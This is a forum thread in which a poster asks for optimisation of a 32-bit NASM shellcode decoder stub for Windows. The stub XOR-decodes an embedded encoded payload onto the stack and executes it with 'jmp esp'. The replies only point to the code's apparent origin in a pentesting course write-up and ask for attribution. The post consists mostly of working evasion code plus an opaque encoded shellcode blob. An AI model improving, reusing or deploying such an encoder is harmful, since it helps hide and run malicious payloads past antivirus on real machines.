I am a novice in assembler programming; I would appreciate it if someone could review this NASM assembler code for me. It is about an encoder/decoder.
The encoder performs the following:

  1. pads the shellcode with NOP opcodes so it is 4 bytes aligned
  2. a random byte is generated for each 4 bytes of the shellcode
  3. the 4 bytes are put in the reverse order and XORed with the XOR byte
  4. the process is repeated until the 0x9090aaaa marker is reached

For those good at NASM assembler for Microsoft Windows, could you please optimize this code? The code is working but takes a lot of time.

; 32-bit x86, NASM (Intel syntax), flat position-independent stub.
; Layout: main -> jmp call_shellcode -> call decoder (pushes the address of
; the bytes that follow the call) -> decoder pops that address into esi.
; The stub never returns to its caller: decoder ends in `jmp esp`.
global main

section .text

main:
    jmp short call_shellcode        ; forward jump so the `call decoder` below can push the data address

;-----------------------------------------------------------------------
; decoder
; In:    [esp] = return address pushed by `call decoder` = encoder_shellcode
; Out:   never returns; falls through to `decode`, then `jmp esp`
; Regs:  eax = output offset into the stack buffer
;        edx = input offset into the encoded bytes
;        esi = base of the encoded bytes
;        edi = end-of-data marker (dword compare value)
;        bl/bh/cl/ch = scratch for the four bytes of one group
; Clobb: eax, ebx, ecx, edx, esi, edi, esp, flags
;-----------------------------------------------------------------------
decoder:
    xor eax, eax        ; eax = 0, output offset
    xor ebx, ebx        ; clear so the partial writes to bl/bh below have a known upper half
    xor ecx, ecx        ; same for cl/ch
    xor edx, edx        ; edx = 0, input offset
    pop esi             ; esi = address of the encoded bytes (return address of `call decoder`)
    mov edi, 0xaaaa9090 ; marker dword; in memory (little-endian) this is the byte run 90 90 aa aa that ends the data
    sub esp, 0x7f       ; reserve the output buffer below the original esp: 4 x 0x7f = 508 bytes
    sub esp, 0x7f       ;   (not 512). 0x7f is the largest positive imm8 for the 3-byte `sub esp, imm8`
    sub esp, 0x7f       ;   form -- presumably chosen for encoding reasons; confirm. No bounds check
    sub esp, 0x7f       ;   exists in the loop, so a decoded payload longer than 508 bytes writes past this buffer.

; One encoded group is 5 bytes at esi+edx: [key][b1][b2][b3][b4].
; Output for the group is b4 b3 b2 b1, each XOR key, stored at esp+eax.
; Invariant per iteration: edx = 5*i, eax = 4*i (reads advance by 5, writes by 4).
decode:
    mov bl, byte [esi + edx + 1]    ; read 1st encoded byte
    mov bh, byte [esi + edx + 2]    ; read 2nd encoded byte
    mov cl, byte [esi + edx + 3]    ; read 3rd encoded byte
    mov ch, byte [esi + edx + 4]    ; read 4th encoded byte
    xor bl, byte [esi + edx]        ; xor with the key byte (the key at offset 0 of the group is re-read for each byte)
    xor bh, byte [esi + edx]        ; xor with the key byte
    xor cl, byte [esi + edx]        ; xor with the key byte
    xor ch, byte [esi + edx]        ; xor with the key byte
    mov byte [esp + eax], ch        ; store in reverse order: 4th byte first ...
    mov byte [esp + eax + 1], cl    ; ... 3rd
    mov byte [esp + eax + 2], bh    ; ... 2nd
    mov byte [esp + eax + 3], bl    ; ... 1st; this restores the original byte order

    cmp dword [esi + edx + 5], edi  ; is the dword at the next group's key position the marker 90 90 aa aa?
    jz execute_shellcode            ; yes: every group has been decoded, run the buffer

    inc edx                         ; edx += 5: skip key + 4 data bytes
    inc edx                         ;   (five inc's instead of `add edx, 5` -- presumably an encoding choice; confirm)
    inc edx
    inc edx
    inc edx
    add eax, 4                      ; eax += 4: next output slot
    jnz decode                      ; eax is non-zero until it wraps at 2^32, so the marker compare above is the
                                    ; real exit; if the marker is never found the loop keeps reading and writing
                                    ; past both buffers until it faults -- there is no length guard.

execute_shellcode:
    jmp short esp       ; transfer control to the decoded bytes at the bottom of the reserved buffer.
                        ; `short` only applies to displacement jumps; on a register operand it is meaningless
                        ; and the assembler may reject or ignore it -- confirm. This executes from the stack,
                        ; so it relies on a non-executable-stack protection (DEP/NX) being absent; with DEP
                        ; enforced the jump faults here.

call_shellcode:
    call decoder        ; pushes the address of the bytes that follow (encoder_shellcode) as the return
                        ; address; decoder pops it into esi and never returns here
    encoder_shellcode: db 0x71,0x71,0xfe,0x99,0x8d,0x9a,0x13,0xfa,0x9a,0x9a,0x08,0x6c,0xda,0x39,0xed,0x0d,0x86,0x3d,0x5f,0x86,0x6c,0x3e,0xe7,0x60,0x3e,0x8d,0x82,0x72,0xbc,0x99,0x36,0xbd,0x10,0x7c,0x81,0xb0,0x70,0x81,0x98,0xc2,0x43,0x3f,0x22,0x7f,0xef,0xa4,0x65,0x84,0x88,0xa6,0x19,0xde,0x18,0x14,0xd6,0x2d,0x7f,0xc2,0x58,0x64,0xe3,0x68,0xf3,0xb1,0x68,0x39,0xe9,0x38,0x05,0x7b,0x79,0x2e,0x01,0x39,0xf2,0x18,0x54,0x6c,0xd8,0x9d,0x64,0xef,0x34,0xb4,0x65,0xb0,0xe8,0x3b,0xa8,0xf8,0x5c,0xd9,0x8f,0x5d,0x7c,0x75,0x3c,0x49,0x01,0xbc,0x56,0x62,0xdd,0xa9,0x67,0xc8,0xf9,0x1e,0xc9,0x43,0xfa,0x35,0x3b,0x56,0x3a,0xee,0xd6,0x29,0xef,0xe3,0xa9,0xaa,0x5d,0xdc,0x49,0xcf,0xb2,0xf4,0x37,0xb2,0xea,0xb2,0x0a,0x9f,0xce,0x1a,0x1b,0x3e,0x42,0x91,0x8c,0x80,0x07,0xea,0x5f,0xcf,0xd3,0x97,0x44,0x84,0xfa,0xfe,0x71,0x29,0xfb,0xe1,0x68,0x31,0xe0,0x6a,0xf2,0xa9,0xd6,0xd6,0xb6,0x3a,0x60,0x63,0x5b,0x61,0xd3,0x8b,0x33,0x2c,0x82,0xfb,0xe9,0x70,0xa1,0xa4,0x05,0xfa,0xfa,0x85,0xec,0x41,0x72,0x29,0x1c,0xbe,0xe5,0x8d,0xe5,0xe5,0xd7,0x90,0xcf,0xa2,0xe3,0xe7,0x07,0x70,0x4b,0x6f,0x53,0x4f,0xa7,0xc6,0x48,0x69,0xd7,0x47,0x6f,0x07,0x28,0xde,0xf7,0xde,0xde,0xdf,0x98,0xf0,0xc8,0xcc,0x5c,0xba,0xba,0xd1,0x3a,0x93,0x7c,0x76,0x16,0xa9,0x83,0x36,0x0e,0x9e,0xf6,0x5e,0x1f,0x1f,0x1d,0x77,0x1e,0x14,0xf2,0x9d,0x48,0x05,0xea,0xba,0xba,0xba,0xba,0x87,0xd7,0xc7,0xd7,0xc7,0x05,0xda,0x0a,0xef,0x6d,0xb3,0x24,0x66,0x4c,0x53,0x30,0x67,0x66,0x20,0x5a,0xa9,0xdd,0x0c,0x30,0xc1,0x3a,0xbf,0xef,0xc5,0x5b,0xa2,0x5d,0xa8,0xd6,0x62,0x67,0x8b,0x12,0x6f,0x29,0x9e,0x9e,0x9e,0xf9,0x76,0x60,0x0a,0x60,0x0a,0x60,0xbb,0xd3,0xec,0xed,0xbf,0xc6,0x99,0x0e,0x1f,0xc4,0xa2,0x5a,0x21,0x77,0x5d,0x98,0x13,0xae,0xe6,0x98,0xc0,0xa8,0x80,0xaa,0xf6,0x27,0x27,0x27,0x37,0x27,0xd9,0xb1,0xd9,0xb3,0x8f,0x03,0xe6,0x50,0xa7,0x5b,0x6c,0x3f,0xff,0xb9,0x93,0x4a,0x19,0x1c,0x4a,0x20,0x20,0xf9,0x22,0x48,0x77,0x4e,0x9b,0xb1,0x11,0x86,0xf6,0x8b,0xf6,0x0e,0x75,0xa1,0xa1,0xc9,0xf9,0x89,0xbc,0xd6,0xbc,0xbc,0xfc,0x37,0x3c,0x5f,0x67,0x37,0x20,0xdf,0x10,0x2f,0x0f,0x36,0x43,0x5e,0x61,0xe3
,0xc2,0x3d,0xa3,0x8f,0xac,0x11,0xee,0x4f,0x4f,0xc4,0x9a,0x1f,0x95,0xbe,0x96,0x79,0x86,0x86,0x86,0x09,0x28,0xd7,0xd7,0xb3,0xc1,0xf7,0xde,0x34,0xf6,0x08,0x8a,0x49,0x4b,0xff,0x4c,0x4a,0xe8,0xff,0xba,0xf1,0xcc,0x9f,0xcc,0xa6,0x9a,0xf4,0x64,0x64,0x21,0x0b,0x90,0x90,0xaa,0xaa


ret                     ; not reachable from this stub's own control flow (decoder ends in `jmp esp`);
                        ; presumably a leftover from a template -- confirm before relying on it



Why does this code look like what I see at https://snowscan.io/custom-encoder/# ?
If you feel the need to discuss Snowscan's code, I see contact information there.

When you post someone else's code, give attribution.

I wish I could help but unfortunately I don't know Assembly beyond one course I took in college, two decades ago.

However, to rproffitt's point, it's usually considered good etiquette/technique to give someone credit in the code comments if you're copying/pasting their code.

That being said, the bottom of the article that rproffitt linked to said that the code was created as part of a student's project for a course that was taken at https://www.pentesteracademy.com/course?id=3

Unfortunately it looks like it's a couple hundred dollars but you get access to the videos for the course.

Good luck!
